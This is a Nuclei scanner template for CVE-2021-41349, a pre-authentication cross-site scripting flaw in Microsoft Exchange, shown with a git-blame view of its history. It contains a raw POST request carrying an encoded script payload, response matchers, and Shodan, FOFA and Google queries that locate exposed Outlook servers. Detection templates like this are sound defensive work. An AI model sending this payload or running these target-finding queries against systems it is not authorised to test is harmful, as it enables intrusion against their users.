nuclei-templates/http/cves/2021/CVE-2021-41349.yaml

id: CVE-2021-41349

info:
  name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
  author: rootxharsh,iamnoooob
  severity: medium
  description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
  remediation: |
    Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
  reference:
    - https://www.microsoft.com/en-us/download/details.aspx?id=103643
    - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41349
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41349
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-41349
    epss-score: 0.96172
    epss-percentile: 0.99474
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - vuln:cve-2021-26855
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,xss,microsoft,exchange

http:
  - raw:
      - |
        POST /autodiscover/autodiscover.json HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        %3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'alert(document.domain);'
          - 'a=""'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: word
        negative: true
        words:
          - "A potentially dangerous Request.Form value was detected from the client"

      - type: status
        status:
          - 500
# digest: 4a0a0047304502210082ffeba5244b2355aebb82708913ac003ec222501eb6c2178ff0907e6b08c269022028637f8d68527b70f61dec192fe664515fe8c4ee71f67d562e0dedb37e373144:922c64590222798bb761d5b6d8e72950
template fix 2021-11-12 18:59:04 +00:00			`id: CVE-2021-41349`
Add CVE-2021-41349 2021-11-12 18:25:15 +00:00
			`info:`
Normalization of Cross-Site Scripting names (#5329) 2022-09-09 17:34:37 +00:00			`name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting`
template fix 2021-11-12 18:59:04 +00:00			`author: rootxharsh,iamnoooob`
Add CVE-2021-41349 2021-11-12 18:25:15 +00:00			`severity: medium`
Enhancement: cves/2021/CVE-2021-41349.yaml by mp 2022-03-07 18:40:20 +00:00			`description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Apply the latest security updates provided by Microsoft to mitigate this vulnerability.`
template fix 2021-11-12 18:59:04 +00:00			`reference:`
Enhancement: cves/2021/CVE-2021-41349.yaml by mp 2022-03-07 15:43:02 +00:00			`- https://www.microsoft.com/en-us/download/details.aspx?id=103643`
template fix 2021-11-12 18:59:04 +00:00			`- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-41349`
			`- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41349`
Auto Generated CVE annotations [Fri Nov 12 19:00:28 UTC 2021] :robot: 2021-11-12 19:00:28 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.5`
Auto Generated CVE annotations [Fri Nov 12 19:00:28 UTC 2021] :robot: 2021-11-12 19:00:28 +00:00			`cve-id: CVE-2021-41349`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-score: 0.96172`
			`epss-percentile: 0.99474`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: microsoft`
			`product: exchange_server`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- vuln:cve-2021-26855`
			`- http.favicon.hash:1768726119`
			`- http.title:"outlook"`
			`- cpe:"cpe:2.3:a:microsoft:exchange_server"`
			`fofa-query:`
			`- title="outlook"`
			`- icon_hash=1768726119`
product/queries updated 2024-05-31 19:23:20 +00:00			`google-query: intitle:"outlook"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`tags: cve,cve2021,xss,microsoft,exchange`
template fix 2021-11-12 18:59:04 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Add CVE-2021-41349 2021-11-12 18:25:15 +00:00			`- raw:`
			`- \|`
			`POST /autodiscover/autodiscover.json HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

misc updates 2021-11-12 19:07:40 +00:00			`%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1`
Add CVE-2021-41349 2021-11-12 18:25:15 +00:00
template fix 2021-11-12 18:59:04 +00:00			`matchers-condition: and`
Add CVE-2021-41349 2021-11-12 18:25:15 +00:00			`matchers:`
template fix 2021-11-12 18:59:04 +00:00			`- type: word`
			`words:`
misc updates 2021-11-12 19:07:40 +00:00			`- 'alert(document.domain);'`
			`- 'a=""'`
			`condition: and`
template fix 2021-11-12 18:59:04 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- 'text/html'`

Fixed CVE-2021-41349 Template 2022-05-26 03:05:36 +00:00			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`negative: true`
Fixed CVE-2021-41349 Template 2022-05-26 03:05:36 +00:00			`words:`
			`- "A potentially dangerous Request.Form value was detected from the client"`

template fix 2021-11-12 18:59:04 +00:00			`- type: status`
			`status:`
Enhancement: cves/2021/CVE-2021-41349.yaml by mp 2022-03-07 15:43:02 +00:00			`- 500`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a0047304502210082ffeba5244b2355aebb82708913ac003ec222501eb6c2178ff0907e6b08c269022028637f8d68527b70f61dec192fe664515fe8c4ee71f67d562e0dedb37e373144:922c64590222798bb761d5b6d8e72950`